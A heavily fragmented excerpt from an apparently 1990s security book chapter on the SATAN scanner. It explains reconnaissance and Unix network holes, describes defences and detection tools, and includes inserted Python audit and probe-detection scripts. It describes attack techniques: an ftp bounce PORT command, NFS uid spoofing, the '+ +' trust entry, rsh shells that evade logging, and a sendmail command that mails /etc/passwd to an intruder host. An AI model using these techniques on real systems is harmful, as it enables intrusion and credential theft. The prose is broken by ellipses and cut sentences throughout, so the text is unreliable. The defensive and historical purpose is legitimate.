NIS should never be accessible to the Internet and should not be used in a potentially hostile environment. NIS+ tries to address many of these issues and should be considered as a replacement.

Although the only Web server vulnerabilities discovered have been related to the https (SSL version of http) services, the dynamic growth of Web server functionality will certainly lead to vulnerabilities.

Even though there are no current Web server vulnerabilities, Web servers are a source of information leakage. By using a Web browser, a hacker can find information about users and systems in the remote network. ... html or similar Web page paths, scanning the pages for addresses with the domain notreal ... (PERL would seem ideal for this task ... 0 or SSLeay ... ) SATAN could easily be modified to support such Web scanners. ... com connect to it, a hacker can gain information about the client systems. Of course, such an approach can be extended to making corrupted binaries, Java pages, PostScript documents, or e-mail messages.

Note A useful Web site for looking up user e-mail addresses is http://okra ... edu/okra/ ...


NNTP Information
SATAN does not scan for information available through network news. It is possible to scan every posting to network news for addresses ending in notreal ... These could be part of e-mail addresses of the posters from within notreal ... com users ... com's systems and users. Having embedded MIME statements in news postings can be a hidden danger if the newsreader, such as tin or Netscape, can interpret them. ... rhosts file, this could open your system to a trust attack. These packets can be used to build up a picture of the routing tables (netstat -r) on each of the systems in notreal ... They also help to add hostnames to the list of systems in that domain. SATAN indicates whether or not a system is running gated. Programs such as idlookup enable you to determine information about the originator of a network connection to your system. If you can get a user to connect (by sending mail to you, ftping to you, or using a Web browser to connect to your Web site), you can use idlookup to gain this information.

If a hacker knows that a large server is accessed by a client at a certain IP address, for example, the hacker can do multiple connects to the auth port on the large server, masquerading as the client (perhaps using the FTP server bounce vulnerability), indicating the shell or login ports as destination ports on the server, and scanning all possible ports on the client. These users would be possible victims for an ...


Packet Sniffing
Although packet sniffing is more closely related to the third phase of a network attack, and SATAN deals mainly with detecting first phase vulnerabilities, packet sniffing is still one of the most commonly used Internet attacks. ... com ... Capturing X authority information, NIS maps, or DNS maps can also be quite useful. Even if the hacker sees only a password for a user on an outgoing connection, a login/password combination is useful knowledge because most users use only a limited number of different passwords. ... com ... It could be used to provide an example of how to embed a packet sniffer into another program in a virus type format.



Note tcpdump and libpcap are available from the CIAC archives at http://ciac ... gov ... When tcpdump is run, it prints out the contents of each packet that passes by the network interface. libpcap offers a library of routines that monitor LAN traffic.


IP Layer Information
A hacker would like to know if the target systems permit IP source routing and IP forwarding. The traceroute program is a useful vehicle for this; using the -g option for loose source routing, or by modifying it for full source routing, the intruder can source route a packet to the target and attempt to get a reply.

If the target system has a weak firewall implementation, such as something that does only application-level filtering, the hacker could try to get the transport layer to send a packet into the network by using IP forwarding. If a hacker is able to see such fragmentation occurring, by packet sniffing, the hacker can try to exploit it by intercepting the connection and spoofing portions of the TCP header.


X11 Information
An improperly configured X Windows server is a major vulnerability. By using an XOpenDisplay() call to the target system, a hacker can identify if access controls permit a remote user to capture control over it. The SATAN reports indicate whether or not remote systems have X Windows access control. An option to rexd can require the remote system to be listed in the hosts ... Even if the remote system hostname must be listed in hosts ... A hacker can try to poison a dns cache with fake resource records to circumvent this security.

SATAN includes a scan for rexd. This also permits a hacker to gather information about remote hosts and routers. There are two kinds of requests:
- SNMP GetRequest ...
- SNMP SetRequest ...

An MIB corresponds to a system setting. SNMP applications are on ftp://lancaster ... cmu ...

The three most useful applications are snmpget, snmpnetstat, and snmpwalk. The snmpnetstat utility can be used by a hacker to effectively run netstat on the remote system. ... notreal ...

    Proto Recv-Q Send-Q  Local Address            Foreign Address          (state)
    tcp        0      0  sys2 ... com ... telne    m2 ... com ...            ESTABLISHED
    (second connection; only "notreal ... 2895" survived in the foreign address)  ESTABLISHED

The snmpwalk generates a printout of vast amounts of information about the remote system, much of it related to kernel transport status. ... conf file ...

By default, remote users cannot alter MIB values but can read all MIB values. ... conf file has a set-community-name setting, remote managers can do SNMP SetRequests, permitting them to modify the local system's MIB values. If the snmp ...



Although snmp v1 is useful for gaining system and routing information, the new snmp v2 has adequate security to prevent most attacks. SATAN does scan for the presence of snmpd, but does not interrogate the server for information. While major vulnerabilities in these services are not popularly known, their presence may be useful as new vulnerabilities are discovered. Although uucp used to be very helpful for attacking systems, its usage has dropped considerably.

Similarly, gopher's popularity has declined dramatically as the popularity of the World Wide Web has gained.

talk is still a useful attack point, because it permits a remote user to write to a user's tty, perhaps invoking commands and actions. ... relay chat is interesting, but it offers little for attack and will certainly waste your time. Finally, systat is rarely seen but remains a great source of information when it is present. This corresponds to the completion of a SATAN scan. In addition, SATAN would generate reports and databases of additional hosts to scan in the future. A vigilant system administrator should consider adding additional scans to SATAN to cover all possible vulnerabilities. Most vendor code is based on publicly available source, from BSD, ATT, Sun, or private locations.



The Linux distributions are extremely helpful in understanding the operation of most programs. For example, NIS+ from Sun has a cousin in Linux called NYS. ... unc ...

The BSD44 distribution is available on CD-ROM from many bookstores now and is useful in understanding the transport layer implementation as well as many of the standard services, such as rlogin or inetd. ... cs ... edu
- bind: ftp://gatekeeper ... com/pub/misc/vixie
- wu-ftpd: ftp://wuarchive ... edu
- httpd: http://www ... uiuc ...
... tis ... One vendor might fix one problem on one platform, but the other platforms from that vendor won't be fixed until later, and platforms from other vendors won't be fixed for quite some time later. ... com's systems for these holes.

Some Unix problems are re-opened in new releases, or are never really closed. Has there ever been a new Unix OS release that didn't have at least one set-uid root script?

The hacker has gathered quite a bit of information on the remote systems in notreal ... At this point, a hacker should be able to identify some weaknesses—a system that offers unrestricted NFS exports or X Windows server access, for example.



As an example, any weaknesses in sendmail, due to old versions or configuration mistakes, might permit the sending of the /etc/passwd file. An accessible X Windows system can allow a hacker to take control of the target. An NFS server can offer access to file systems. The tftpd might permit the downloading of files from any directory. ... rhosts into the ~ftp directory.

Look for Weak Links
If the network scans don't reveal any vulnerabilities, the hacker may need to resort to non-network attacks. The hacker uses a modem to call every single phone extension in an organization until the hacker discovers all modems connected to phone lines. ... " If the site permits dial-in access, this could lead to an intrusion. The hacker might try to use people inside the organization, or former employees, to gain information or access.

Summarize the Remote Network Attack
To summarize, the first phase of an attack is to get a login and password on the target systems. By matching the vulnerability with the opportunity, the hacker can gain access. One should seriously consider automating the search for network vulnerabilities.



The First Meeting with SATAN
"Soon will rise up what I expect;
and what you are trying to imagine now
soon must reveal itself before your eyes ..."

The authors indicate that SATAN stands for "Security Analysis Tool for Auditing Networks." Users indicate a target host or network, along with proximity search levels and search depth, and initiate a search. (Proximity rules are fully explained later in this chapter.) SATAN can be configured to make scans of the target and all hosts that are a certain proximity level away from that target.

SATAN consists of a small PERL kernel, along with a number of C programs that do vulnerability checks, and a large number of PERL support programs that control the searches, store results to database files, generate reports, and emit HTML forms.


History
The two authors of SATAN, Wietse Venema and Dan Farmer, have had a long history of association with network security. ... html Web page in their SATAN distribution, some of the design goals of SATAN were as follows:
- Investigate mapping of the security of large networks
- Use the traditional Unix toolbox approach of program design
- Make the product freely available
- Discover as much network information as possible without being destructive
- Create the best investigative security network tool

Although early versions of SATAN were already available in late 1993, the advent of Web browsers in 1994 seemed to be the big turning point for the direction of the program. The creators chose April 5, 1995, Dan Farmer's birthday, to release SATAN to the world. This could have been due to the media's continuing interest in network security, the unique name of the program, or the flamboyance of one of the creators. ... " The Los Angeles Times warned, "SATAN is like a gun, and this is like handing a gun to a 12-year-old ..." The San Francisco Chronicle had photos of Dan Farmer, along with the story. The program was distributed by dozens of FTP sites to thousands of users.

Quite quickly, a security hole was found in SATAN, resulting in a revision and redistribution of the program. SATAN did not appear to greatly increase the number of intrusions, but it did lead to a strengthening of network security by causing vendors to release patches and users to inspect and tighten up their system security.

Individual users have added such probes but are perhaps not forwarding these additions back to the major distributions. He has written many useful security tools, such as tcp_wrappers, a secure portmap program, a secure rpcbind program, logdaemon, which improves logging and auditing, as well as SATAN. A complete list of his papers and tools is available via ftp://ftp ... tue ... html ... As a result of SATAN's release, he was interviewed on TV and quoted in quite a few newspapers and magazines. His home page is at http://www ... com/dan ...



Comparison to Other Tools
SATAN was not the first program to look for network vulnerabilities. Unlike SATAN, the latest ISS is not free, but is instead a commercial product that does not include source code. ... com/ for more information ... uunet ... sources ...

Fremont, a freely available program, does a scan of hosts and attempts to build a map of systems. It is available from ftp://ftp ... colorado ...

Vendor Reactions
SATAN had the effect that the creators may have secretly desired. Such public disclosure of holes is risky, however; users who are unaware of workarounds or patches may be vulnerable to holes for some time, whereas intruders have been alerted to them. All the major vendors released extremely detailed bulletins in response to SATAN, some before SATAN's release and the rest within weeks after SATAN's release. The bulletins also indicated configuration recommendations and advice on the trade-offs between running some products (finger) and the risk involved. See http://ciac ... gov/ciac/ ...

Surprisingly, few stories of intrusions as a result of SATAN have been publicized. For HP, the SATAN advisory continues to be requested every week, making it the most popular security bulletin ever published, with perhaps 10,000 copies distributed. SATAN does provide a flexible architecture for adding such checks, an easy way to intelligently scan many hosts, as well as a nice reporting mechanism and database format. The most popular SATAN detection program is Courtney, but the others listed here are also quite useful. The program is a short PERL script that uses the tcpdump packet sniffer library (libpcap) to monitor all network traffic to a system.

Courtney requires the tcpdump libpcap library, which uses the system's LAN in promiscuous mode, something that not all systems support. ... llnl ...
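The detection idea behind Courtney, as an added example in Python (not Courtney's own Perl code): a SATAN scan looks like one source touching many distinct service ports on one host within a short time. The event tuples stand in for what a libpcap listener would hand over; the sample events, the window and the threshold are constructed for this illustration.

```python
"""Courtney-style SATAN probe detector (added example, not Courtney's code).

Each observed connection attempt is (timestamp_seconds, src, dst, dst_port).
A source that touches PORT_THRESHOLD or more distinct ports on one host
inside WINDOW_SECONDS is reported once.  Both constants are assumptions.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 60      # how long one source's probes are remembered
PORT_THRESHOLD = 8       # distinct ports from one source that trigger an alert


class ProbeDetector:
    """Track, per (source, destination) pair, the service ports the source
    touched within the last `window` seconds and alert when the count of
    distinct ports reaches `threshold`."""

    def __init__(self, window=WINDOW_SECONDS, threshold=PORT_THRESHOLD):
        self.window = window
        self.threshold = threshold
        self.history = defaultdict(deque)   # (src, dst) -> deque of (ts, port)
        self.alerted = set()                # pairs already reported

    def observe(self, ts, src, dst, dport):
        """Record one connection attempt; return an alert string or None."""
        key = (src, dst)
        hist = self.history[key]
        hist.append((ts, dport))
        # forget probes that fell out of the sliding window
        while hist and ts - hist[0][0] > self.window:
            hist.popleft()
        distinct = {port for _, port in hist}
        if len(distinct) >= self.threshold and key not in self.alerted:
            self.alerted.add(key)
            return "%s probed %d services on %s within %ds" % (
                src, len(distinct), dst, self.window)
        return None


def scan_events(events, **detector_args):
    """Run the detector over a chronological event list; return all alerts."""
    detector = ProbeDetector(**detector_args)
    alerts = []
    for ts, src, dst, dport in events:
        alert = detector.observe(ts, src, dst, dport)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample: a SATAN-like sweep of the services the chapter names
# (ftp, telnet, smtp, finger, portmap, exec/login/shell, nfs, X11) one
# second apart, followed by an ordinary client using smtp and http once a
# minute for half an hour.
SATAN_PORTS = [21, 23, 25, 79, 111, 512, 513, 514, 2049, 6000]
SAMPLE_EVENTS = [(100 + i, "10.0.0.9", "10.0.1.2", p)
                 for i, p in enumerate(SATAN_PORTS)]
SAMPLE_EVENTS += [(1000 + 60 * i, "10.0.0.5", "10.0.1.2", 25 if i % 2 else 80)
                  for i in range(30)]

if __name__ == "__main__":
    for line in scan_events(SAMPLE_EVENTS):
        print(line)
```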


Gabriel
Instead of a PERL script, Gabriel is a binary, built from C source, that offers similar functionality, but without requiring the tcpdump libpcap library. It is freely available from http://www ... com/gabe ...

TCP Wrappers
The TCP wrapper program can be used to log attempts to connect to network services. In addition to the TCP_wrappers program, some inetd programs, and xinetd, include TCP wrapper functionality. tcp_wrappers can be used to permit (/etc/hosts ... deny) access based on the remote IP address and the owner of the remote connection. Many inetd programs use inetd ...



Xinetd provides this functionality and adds control over the time of the connection attempt. Xinetd also permits access control over every UDP packet instead of just the initial one. ... win ... nl/pub/security ... ieunet ... 14 ... gz ... Although intended for Sun systems, netlog should be able to be ported to any system that offers similar functionality. ... tamu ...

Argus
CMU's SEI group, closely associated with CERT, offers an IP network transaction management and monitoring program called Argus. ... sei ... edu/pub/argus-1 ...

Using Secure Network Programs
You are now aware of the following:
- The details of the first phase of a network attack
- How SATAN is used to mount these attacks
- The resources available for dealing with network vulnerabilities
- The network monitoring tools that can detect attacks

... Although minor changes to existing network services can minimize vulnerabilities, major changes are frequently required to deal with inherent problems of the Internet. SATAN searches for phase one vulnerabilities that permit unauthorized access. By using Kerberos, a system is no longer vulnerable to ... SATAN is still useful against Kerberized environments, however, by helping remote hackers to identify KDCs.
...

The primary problem with Internet security today is that the passwords of users go across the network in the clear, and authentication is based solely on the IP address and password.

MIT developed a system called Kerberos that uses the DES algorithm to encrypt network connections and provide for authentication. Each network service is modified to use authentication based on tickets that are handed out by the KDC in response to requests by network clients. This generates a request from the workstation to the KDC for a ticket-granting ticket (TGT) that is good for the rest of the day. The ticket contains a session key that is then used by both the telnet client and server to encrypt the connection. Kerberos uses the 56-bit DES algorithm to encrypt packets. ... S ... Although 56 bits sounds strong, it isn't that strong, and brute force attacks can decrypt packets. The system admin must now maintain KDCs to support the network. If the KDCs are violated, the security of the entire network has been destroyed. Some Kerberos implementations are insecure on multiuser systems. Imagine if the KDC ran NFS; the hacker could use NFS-based attacks to gain access to that system, permitting the hacker to gain access to all systems that trusted that KDC. ... S ... cygnus ... Other vendors, such as Cybersafe, offer commercial Kerberos implementations.



Secure Shell (ssh)
SATAN searches for phase one vulnerabilities. A replacement for rlogin, remsh, and rcp, ssh doesn't require the overhead of Kerberos (users don't have to kinit, and the system administrators do not need to maintain KDCs) and offers higher levels of cryptographic security.

ssh protects against IP spoofing, IP source routing, DNS spoofing, corruption of data in a connection, and X authentication attacks. ... uni-karlsruhe ... The program itself is available from ftp://ftp ... hut ...

SSL
Yet another way of dealing with phase one vulnerabilities, the vulnerabilities that SATAN is designed to locate, is SSL. A draft RFC describes version 3 of the protocol, enabling anyone to implement daemons, although licensing for the public key technology is still required. The public key is stored in an X ...

SSL moves the details of encryption and authentication into the socket library calls, making implementation of Internet programs much easier. Compared to making a Kerberos server, making an SSL server is vastly simpler. So the network connection is a two-party transaction, rather than a three-party transaction. The SSL protocol negotiates a crypto algorithm at the beginning of a connection; DES, triple-DES, IDEA, RC4, and RC2, along with md5 hashes, are advertised in common implementations. ... S ... S ...

Two publicly available implementations of SSL libraries are popular: SSLref and SSLeay. It requires the RSAref library from RSA Corporation. ... S ... The addresses follow:
- SSLref Source: http://www ... com
- SSLeay Source: http://www ... uq ... au/~ftp/Crypto/
- RSA Source: http://www ... com
- VeriSign: http://www ... com
- SSL RFC Draft ... cnri ... va ... txt

Firewalls
SATAN is primarily intended for remote scanning of systems connected to the Internet.

A firewall system is one that connects an internal network to the Internet. By reducing the number of systems directly on the Internet to a limited number that are under the scrutiny of administrators, the level of vulnerability can be minimized.

The DNS configuration on the firewall system should minimize the amount of information available to external users.

Modifying a company network to use firewalls is a complex task that requires time and consideration. CERT has a paper on packet filtering that can assist you in configuring a firewall. ... com ... Other papers on the topic are available via the COAST and CERT archives. Some firewalls permit telnet or FTP connections to cross the firewall by requiring an additional password for the firewall; some use S/Key; and some use SecurID smart cards.

The importance of properly configuring a firewall, applying patches in a timely manner, and limiting the amount of services available to Internet users cannot be overestimated.



The addresses follow:
- TIS firewall: ftp://ftp ... com/pub/firewalls/toolkit
- CERT packet filtering paper: ftp://ftp ... org/pub/tech_tips/packet_filtering
- S/Key source: ftp://thumper ... com/pub/nmh/skey

Note For more information on firewalls, see Chapter 7.

... It permits users to conveniently use Internet services across a gateway without being aware that a gateway is being crossed. As a result, SATAN's scan of target firewall systems will frequently indicate the presence of a socksd.

Normally, a telnet from host A to host B does a connect() directly between the two IP addresses using the standard transport routing tables. ... If it is, it follows that standard connection process. It then encapsulates the TCP packets according to the socks protocol and sends them to the socks server, which runs on a gateway system and has direct connectivity to the destination system.

If your firewall configuration supports a socks server, you must have socksified clients to take advantage of this service. ... )

The addresses follow:
- socks: ftp://ftp ... com/pub/security/socks ... socks ... com
- HP-UX socks: ftp://ftp ... hp ...

—Dante Alighieri, Inferno, Canto XVII, lines 27–29

This section describes the exact details of the network holes uncovered by SATAN, as well as holes that are common. The number of ports scanned depends on the type of scan specified: light, normal, or heavy.

The dns scan uses nslookup to gather as much information as possible about the target host, including MX records and authoritative name servers for that host. It then scans this list, looking for the following services: rexd, arm, bootparam, ypserv, ypbind, selection_svc, nfs, mountd, rusersd, netinfobind, and admind. The showmount scan first asks the target mountd to list what file systems are exported and what hosts are permitted to mount them (via the showmount -e command).


Normal Scans
The normal scan does everything included in the light scan and adds scans of fingerd, various TCP services, and UDP services.

If the target is m2 ... com, the finger scan tries to finger -l the following: @m2 ... com, 0@m2 ... com, @@m2 ... com, root@m2 ... com, demo@m2 ... com, and guest@m2 ... com. SATAN then scans UDP ports for dns and xdmcp.

SATAN now tries to contact the rpc bootparam service to get the NIS domain name.

If SATAN gets the domain name, it then runs a yp-chk program to try to get the passwd ...

Heavy Scans
The heavy scan includes everything from the light and normal scans and adds a much larger search for active services. (A comment in satan ... ) The UDP scan runs from 1 to 2050 and from 32767 to 33500. ... satan scripts need to be run, based on the results of the previous port scans.


Vulnerabilities that SATAN Investigates
SATAN includes checks for a number of common security vulnerabilities. If it does, it checks to see if the ~ftp directory is writeable by the anonymous user.

The SATAN documentation explains how these checks correlate to known vulnerabilities. The documentation also mentions that the ~ftp/etc/passwd file is a useful item, but SATAN does not attempt to retrieve this. First, the presence of anonymous FTP is not a security hole in itself.

A hacker with access to the ~ftp directory can upload an ... The hacker can then rlogin to the system using the FTP login account and gain access without typing a password.



A hacker could upload a ... com < /etc/passwd, into the ~ftp directory. The hacker can then use Crack to attack the passwords on the system. A system using ftpd with sublogins depends on ~ftp/etc/passwd for permitting access to users. Similarly, modification to utilities such as bin/ls or bin/sh can offer the intruder opportunity for attacks. Some unsuspecting users might retype their password to this bogus prompt, and the modified /bin/ls could store this information.

The wu-ftpd program had two vulnerabilities, CERT CA-93:06 and CA-94:07, that permitted remote users to gain access to the system. Second, the SITE EXEC command permitted users to execute commands as root.

The presence of an ~ftp/etc/passwd file with encrypted fields is another potential security hole. For those ftpds that use sublogins, the encrypted fields are used for authentication. Users should be required to have different passwords for anonymous sublogins and normal system logins. SATAN does not get the ~ftp/etc/passwd file. This problem could be checked by trying a PORT command with an IP address different than the originating source, or with a privileged TCP port number on the originating source. ... 2 ... 4, the hacker would specify PORT 1,2,3,4,0,25 to spoof e-mail onto his or her own system, or PORT 2,3,4,5,0,21 to spoof the IP address to the FTP port of the system at IP address 2 ... 4 ... A fixed ftpd would not permit either action.

As mentioned in the white paper, a remote user could gain root access by embedding a CWD / command between the USER and PASS commands.

    ... com
    Connected to notreal ... com FTP server ready ...

At this point, the ftpd has chrooted to the / directory rather than the ~ftp directory and has suid to root. An unimplemented fourth level of SATAN scanning, "All Out," would probably be the right place for such a scan. From a SATAN standpoint, this does not matter as long as anonymous FTP is enabled. Wu-ftpd also features another configuration file called ftphosts that can be used to specify hosts that are not permitted to use FTP. The assumption behind this concept is that only trustworthy people are able to get root privileges on any system connected to the Internet. To add to this poor assumption, PCs do not typically support the concept of privileges, and they are connected to the Internet.

Regardless of the naive assumption behind privileged ports, many network servers can and do require that clients originate requests from privileged ports. The NFS and mountd services can be configured to require client requests to originate from privileged ports. The mount of a remote NFS file system causes the local system to generate an rpc procedure call to the mountd program on the remote system. The mountd sends the file handle if the request originated from a system listed in the export file list. Once the mountd approves and sends the client a file handle for the file system, the client can now request any file operation on that file system by just providing the file handle as authentication, along with any desired uid and gid (they must be valid on the remote system).



Each file system operation done by the client user gets translated into one of 17 rpc requests
to the remote NFS server
...

The privileged port check for the mountd (rpc
...
The mountd must have been compiled to support this feature
...

The privileged port check for the nfs request is not done in the nfsd program, but rather inside
the Unix kernel
...
It is most useful to have both mountd and nfs check
for privileged port access
...

SATAN tests unprivileged access to both the mountd service and nfs service by generating
non-root rpc calls to both
...
It asks the mountd for
a list of exported file systems, and it asks nfs to do an ls -l type listing of each file system
...
This list specifies
which hosts are permitted to mount the file systems
...
) The hosts can be specified explicitly by name, by netgroups, or by the wild
card everyone
...
The NFS server believes that the client NFS call has valid uid and gid
values
...

If no root access is permitted, any client can mount the file system and act as any user
...
The quicker way to do this is to use
one of the many NFS hacking utilities to change the uid and gid and then call the NFS call
directly
...
The FTP locations of these utilities can be found by doing an
Archie search
...
The SATAN scan could see this or
the everyone export as unrestricted NFS access and report it as a vulnerability
...
If root
access is exported, the hacker has complete control
...
A simple
...
If the hacker has only read access, damage is still likely
...

Another bug in older versions of NFS permitted remote users with a uid of 2^16 to masquerade as root
...

The use of netgroups has been the source of many security vulnerabilities
...

Avoid exporting NFS file systems with write permission, especially when root permission is
granted
...
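The following audit script is an added example, not code from the book or from SATAN. It assumes the Linux nfs-utils /etc/exports syntax and works over a constructed sample file, flagging the three exposures discussed above: exports to everyone, writable exports, and exports that keep a remote root.

```python
"""Audit Linux-style /etc/exports entries for exports to everyone, writable
exports, and exports that keep remote root.

Added example, not code from the book or from SATAN.  It assumes the
nfs-utils exports syntax "<path> <client>(<options>) ...", where a client
of "*" (or a path with no client list) means everyone, the defaults are
read-only and root_squash, and "no_root_squash" keeps a remote uid 0 as
root on the server (so a forged uid of 0 in an NFS call lands as root).
"""

# Constructed sample, not taken from any real system.
SAMPLE_EXPORTS = """\
# path            clients and options
/export/home      *(rw,no_root_squash)
/export/tools     @engineering(ro)
/export/scratch   client1.example.test(rw,root_squash) client2.example.test(rw)
/export/cdrom     *(ro)
/export/wideopen
"""


def parse_exports(text):
    """Yield (path, client, options) for every client of every exported path."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:]
        if not clients:
            yield path, "*", set()          # no client list: everyone, default options
            continue
        for spec in clients:
            if "(" in spec:
                client, opts = spec.split("(", 1)
                options = set(opts.rstrip(")").split(","))
            else:
                client, options = spec, set()
            yield path, client or "*", options   # "(rw)" with no client also means everyone


def classify_export(client, options):
    """Return (severity, reasons), or None when the export is restricted and read-only."""
    everyone = client == "*"
    writable = "rw" in options
    root_kept = "no_root_squash" in options
    reasons = [r for flag, r in ((everyone, "exported to everyone"),
                                 (writable, "writable"),
                                 (root_kept, "remote root kept")) if flag]
    if not reasons:
        return None
    # Everyone plus write or root, or write plus root, gives an attacker full control.
    high = (everyone and (writable or root_kept)) or (writable and root_kept)
    return ("HIGH" if high else "MEDIUM"), ", ".join(reasons)


def audit_exports(text):
    """Return (path, client, severity, reasons) for each risky export entry."""
    findings = []
    for path, client, options in parse_exports(text):
        result = classify_export(client, options)
        if result is not None:
            findings.append((path, client, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for path, client, severity, reasons in audit_exports(SAMPLE_EXPORTS):
        print(f"{severity:6} {path} -> {client}: {reasons}")
```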

Carefully review the netgroup’s man page to ensure the correct format for entries
...
Any client that is able to provide a domain name
can bind to the server
...
The only protection for these maps is the secrecy
of the domain name
...
However, if the remote system runs a bootparam service from the portmap
program, an rpc call to this service returns the domain name
...

After an intruder has this map, a Crack program can attempt to guess the passwords
...
They should always be used behind (and not on) firewalls that filter out traffic
on port 111 (portmap)
...
Because mountd authenticates the client rpc call based on the source IP address, a
request originating from the portmap program would appear to originate from the local
system
...
As long as the local system was permitted to
gain access to itself, the mountd would reply with the file handle for the NFS mount
...

A new portmap program (and rpcbind) prevents such forwarding, and this fix has been
adopted by most vendors
...



Note More details on this vulnerability are available from CERT bulletin CA-94:15, NFS
Vulnerabilities
...


SATAN attempts to get the portmap program to forward a request to the mountd to mount
the exported file systems
...
c program
...


tftp File Access
Many tftpd implementations do no authentication on incoming requests
...
sec, tcp-wrapper, or xinetd) can do authentication, tftpd should be started only from
inetd and should exit after servicing one request
...

A hacker with access to a tftpd that permits access to / can enter a new /etc/passwd, because
tftpd has no authentication and is frequently run as root out of inetd
...
Note
that tftpd does not usually provide a listing facility to show what files exist in the directory
...

Based on knowledge about the OS, the names of boot files and configuration files are typically
quite similar
...


Remote Shell Access
rshd (remshd) and rlogind are services that permit access based on trust
...
rhosts or
hosts
...

One analogy to this situation, which might illustrate the weaknesses, is if you are a bank
manager and you tell your tellers to trust anyone named Bob calling from Cleveland
...
The typical entry in
...
equiv is a hostname followed by a username, such as systemA userB
...
The wild card
entry + + permits any user from any machine to gain entry
...

The presence of + + in the /
...
This addition to /
...



The first improvement to rshd (remshd) and rlogind to deal with improving trust-based
security was the reverse name lookup using the DNS resolver
...
If the hostname matches the hostname sent by the
initial protocol, access is permitted
...
If the owner’s name matches the name claimed by the caller, access is approved
...
If the resolver lookup for the
hostname contacts a caching name server, the name server could have cached a faked PTR
entry that points to the intruder’s name server
...


Note The ftpd server bounce problem mentioned in an earlier section cannot be used to
exploit the TCP port number sent in the opening of the rshd (remshd) protocol
...
Any hacker who wanted to send a potentially untraceable packet, by
specifying a reserved port number such as smtp or FTP, would first require root
access to the system to be able to send the initial rsh (remsh) protocol, because they
must originate from a reserved port and such ports can be obtained only by a root
user
...


System accounts such as bin or daemon should not have functional shells
...
rhosts file exists in /usr/adm
...
rhosts file existed
...
rlogind and telnetd invoke /bin/login, which logs
information into those auditing files
...
The hacker could invoke rsh to the system and invoke csh -i, which would offer the hacker a
shell (but no pty/tty) but leave no traces in the utmp/wtmp
...

Trust-based mechanisms are dangerous
...
Firewall systems should
never permit
...
equiv files to be used
...
conf to prevent
...
equiv files from
being accessed
...
It first tries as user bin and root
...
equiv
...
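The following audit script is an added example, not code from the book or from SATAN, which only looks for the + + entry. It assumes the classic BSD hosts.equiv and .rhosts entry format and runs over a constructed sample file, rating every entry that grants trust.

```python
"""Audit hosts.equiv and ~/.rhosts entries for wildcard and netgroup trust.

Added example, not code from the book or from SATAN.  It assumes the
classic BSD entry format: one "<host> [<user>]" pair per line, where "+"
is a wildcard for either field, a leading "-" denies instead of trusts,
and "+@name" refers to a netgroup.
"""

# Constructed sample, not taken from a real system.
SAMPLE_HOSTS_EQUIV = """\
# host      user
+ +
+ operator
systemA userB
+@admins
-badhost.example.test
systemC
"""


def parse_trust_entries(text):
    """Yield (lineno, host, user) for each non-comment line; user may be None."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        yield lineno, host, user


def classify_entry(host, user):
    """Return (severity, message) for one entry, or None when it only denies."""
    if host.startswith("-"):
        return None                       # negative entry: denies, never grants
    any_host = host == "+"
    any_user = user == "+"
    netgroup = host.startswith("+@")
    if any_host and any_user:
        return "CRITICAL", "any user on any host is trusted (the '+ +' entry)"
    if any_host:
        who = f"user {user}" if user else "same-named users"
        return "HIGH", f"{who} trusted from every host on the network"
    if any_user:
        return "HIGH", f"every user on {host} is trusted"
    if netgroup:
        return "MEDIUM", f"trust delegated to netgroup {host[2:]}"
    who = f"user {user}" if user else "same-named users"
    # Even a named host is only as strong as the hostname lookup behind it.
    return "INFO", f"{who} trusted from {host} (hostname-based, spoofable)"


def audit_trust_file(text, filename="hosts.equiv"):
    """Return (filename, lineno, severity, message) for each granting entry."""
    findings = []
    for lineno, host, user in parse_trust_entries(text):
        result = classify_entry(host, user)
        if result is not None:
            findings.append((filename, lineno, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for filename, lineno, severity, message in audit_trust_file(SAMPLE_HOSTS_EQUIV):
        print(f"{filename}:{lineno}: {severity}: {message}")
```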


rexd
The rexd service enables a remote user to execute a command on the server, similar to rsh or
remsh but with the added feature that the local file system of a user is NFS-mounted on the
remote system, and local environment variables are exported to that remote system
...

The client system uses the on command to invoke the command on the remote rexd server
...
A hacker can either su to a
uid that exists on the remote system, such as bin or daemon, or create a custom program that
does this automatically
...

The rexd can be invoked with an -r option to require that the client system be listed in
hosts
...
rexd is invoked from inetd, so the tcp-wrapper, or inetd
...
However, both of these security enhancements are somewhat weak
...

SATAN checks with the portmap program to see if rexd is available and then uses rex to get
the /etc/motd as proof of access
...
This is a requirement for standard
e-mail service
...
New ones are found quite frequently
...
If the version corresponds to one before 8
...
10 (with some corresponding vendor-specific version numbers), it reports a vulnerability
...

sendmail should not permit remote users to specify a file or a program: these should only be a
result of alias or
...

For example, old versions of sendmail permitted a remote user to specify a recipient of /home/
bkelley/
...
The data portion of the mail message would be appended to this file
...

For an example of program mailing, recent versions of sendmail permitted a sender to be a
program: during the smtp transaction, a mail from: ‘|/bin/mail bkelley@intruder
...
This command would then mail the /etc/passwd file
to bkelley
...
Another attack found in 5
...
If sendmail queued the file, the second user
would be written to a separate R line in the queue file and never be tested to see if it was a
program or file
...
However, not all systems are vigilantly patched
...
This permits any remote system to gain control over the system, including reading
user keystrokes, reading anything that is sent to the screen, starting or stopping any application, and taking control over the currently running session
...
It could use the XOpenDisplay() call to see if the
remote display permitted the intruder system, and therefore anyone, to have access
...
notreal
...
0 xhost
...

Instead of using the xhost mechanism, which depends on IP addresses for authentication, the
...
A utility program called xauth extracts a magic
cookie from the X server
...
This magic cookie can be sent to client systems and merged with
the
...
Each access by the client system
includes the magic cookie that the X server uses to authenticate the client request
...
If the
client’s
...
Note
that the magic cookie approach now permits user authentication rather than xhost’s mere
system authentication
...
Xauthority file containing magic cookies
for accessible X servers
...
An improved
randomization algorithm is referenced in the advisory (Fisher, 1995)
...
If the xterm has an X resource definition
of xterm*allowSendEvents: True, then the X server can request the xterm to send information
about events such as keystrokes
...

The xterm can dynamically set this option through the xterm’s main options menu
...


In general, if xhost access is permitted, the remote system names should be specified rather
than +
...
Xauthority mechanism should be used if at all possible
...
When run interactively, SATAN runs a simple HTML
server, perl/html
...
The HTML
server listens on a random port and requires a password to permit access to various URLs
...

The goal of this design is to prevent unauthorized users from sending requests to the HTML
server
...

